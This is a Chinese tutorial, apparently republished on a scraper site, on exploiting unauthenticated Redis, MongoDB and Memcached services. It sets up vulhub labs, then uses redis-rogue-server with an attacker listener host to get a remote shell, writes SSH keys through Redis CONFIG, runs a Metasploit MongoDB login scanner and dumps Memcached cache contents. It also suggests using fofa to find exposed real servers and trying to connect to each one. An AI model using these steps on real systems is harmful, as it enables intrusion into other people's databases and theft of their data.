当前位置: 首页 > news >正文

景德镇网站建设景德镇500强企业网站建设

景德镇网站建设景德镇,500强企业网站建设,潜江建设局网站,wordpress 组织架构Redis未授权访问漏洞 Redis 默认情况下,会绑定在 0.0.0.0:6379 ,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的…

Redis未授权访问漏洞

                  Redis 默认情况下,会绑定在 0.0.0.0:6379 ,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问Redis 以及读取 Redis 的数据。攻击者在未授权访问 Redis 的情况下,利用 Redis 自身的提供的config 命令,可以进行写文件操作,攻击者可以成功将自己的ssh公钥写入目标服务器的 /root/.ssh 文件夹的 authotrized_keys 文件中,进而可以使用对应私钥直接使用ssh服务登录目标服务器。

    产生条件:

          1.redis绑定在 0.0.0.0:6379,且没有进行添加防火墙规则避免其他非信任来源 ip 访问等相关安全策略,直接暴露在公网;
          2.没有设置密码认证(一般为空),可以免密码远程登录redis服务

4.x/5.x未授权访问

步骤一:进入vulhub目录使用以下命令启动靶机.

进入目录:cd /vulhub-master/redis/4-unacc
启动:docker-compose up-d
检查:docker-compose ps

步骤二:在Kali上安装redis程序进行服务的链接 

#安装redis
apt-get install redis
#redis链接
redis-cli -h192.168.4.176-p 6379
#redis常见命令(1)查看信息:info(2)删除所有数据库内容:flushall
(3)刷新数据库:flushdb
(4)看所有键:KEYS *,使用select num可以查看键值数据。
(5)设置变量:set test"whoami"
(6)config set dir dirpath 设置路径等配置
(7)config get dir/dbfilename 获取路径及数据配置信息
(8)save保存(9)get 变量,查看变量名称
fofa搜索未授权的网站 port="6379"

步骤三:可以直接连接执行命令且不需要认证说明存在未授权访问漏洞间.….下载以下攻击项目.. 

https://github.com/n0b0dyCN/redis-rogue-server

步骤四:使用工具执行以下命令获取目标的命令执行环境,交互时输入i 键会获取Shell环境 

python3 redis-rogue-server.py--rhost 192.168.4.176--lhost 192.168.4.108

---------------------------------------

MongoDB未授权访问漏洞 

              开启MongoDB服务时不添加任何参数时,默认是没有权限验证的,登录的用户可以通过默认端口无需密码对数据库任意操作(增、删、改、查高危动作)而且可以远程访问数据库。

漏洞原因:

                造成未授权访问的根本原因就在于启动 Mongodb 的时候未设置 --auth 也很少会有人会给数据库添加上账号密码(默认空口令),使用默认空口令这将导致恶意攻击者无需进行账号认证就可以登陆到数据服务器。

漏洞复现:

              步骤一:在Kali上执行以下命令搭建起MongoDB的漏洞环境..

拉取镜像:docker pull mongo
启动容器:dockerrun-dp27017:27017mongodb mongo--name
查看容器:docker ps -a

镜像拉不下来,去fofa搜索语句

port="27017"

打开Navicat一个一个测试连接

也可尝试使用MSF中的模块进行漏洞测试..不需要认证即可直接连接.. 

use auxiliary/scanner/mongodb/mongodb_loginshow options
set rhosts 192.168.4.128
set threads 15
exploit

------------------------------------------

Memcached未授权访问漏洞

                  Memcached 是一套常用的 key-value 分布式高速缓存系统,由于 Memcached 的安全设计缺陷没有权限控制模块,所以对公网开放的Memcache服务很容易被攻击者扫描发现,攻击者无需认证通过命令交互可直接读取 Memcached中的敏感信息。

漏洞复现:

        步骤一:下载Memcached程序并执行以下命令..启动Memcached漏洞环境

#Memcached程序下载
https://www.121down.com/soft/softview-28366.htmlhttps://www.runoob.com/memcached/window-install-memcached.html
#执行命令
memcached.exe -d install
memcached.exe -d start

      步骤二:使用Telnet程序探测目标的11211端口. 

#Telnet探测
telnet 192.168.4.199 11211
#操作命令
stats //查看memcache服务状态
stats items //查看所有items
stats cachedump 390//获得缓存key
get:state:264861539228401373:261588//通过key读取相应value获得实际缓存内容,造成敏感信息泄露

 步骤三:使用Nmap程序的脚本进行漏洞扫描…

漏洞修复
1.设置Memchached只允许本地访问,2.禁止外网访问Memcached 11211端口。
3.配置访问控制策略。4.最小化权限运行。5.修改默认端口等。

http://www.yayakq.cn/news/96016/

相关文章:

  • 公司业绩怎么发到建设厅网站上西安网站托管公司招聘
  • 做软件推广网站怎么赚钱龙光城业主论坛家在深圳
  • 做动漫网站的意义网站运营经验
  • 关于集团网站建设的市场体系建设司在官方网站
  • 网站建设费用评估网络推广和网络销售的区别
  • 云南网站建设公司网站文字专题页面怎么做的
  • 软件班级网站建设品牌网站建设内容框架
  • 诸城哪有做公司网站和的服务器怎么直接用ip做网站
  • asp企业网站中国建筑校园招聘官网
  • 网站开发安卓开发上海网站备案需要多久
  • 湛江企业自助建站系统西安优秀网站设计
  • 做饲料机的川工网站文登网站建设
  • 无锡网站建设报价明细表去空格网站
  • 正品海外购网站有哪些旅游网站开发团队
  • 常德网站优化湛江电气建站软件
  • 合肥网站制作套餐学生html个人网页代码
  • 重庆建设网站哪个好html5 手机网站
  • 苏州工业园区两学一做网站湖北科技职业学院
  • 广西工程建设质量安全管理协会网站建设网站请示
  • 网页设计与网站建设在线考试网页效果图制作
  • 网站建设需求确定做废钢推广网站
  • 深圳市手机网站建设品牌北京市朝阳区最新消息
  • 建设厅投诉网站首页wordpress如何实时刷新数据
  • 手机网站APP网络推广商城网站泰安市人才网官网
  • asp网站如何做伪静态制作书签简单又漂亮
  • 太原网站排名系统自动更新wordpress失败
  • 单位网站建设服务仙侠手游代理平台
  • 江西赣鄂皖路桥投资有限公司网站建设常州网络推广
  • 简约中文网站设计欣赏邯郸网站建设效果
  • 邦利博客网站怎么做的丹灶网站建设公司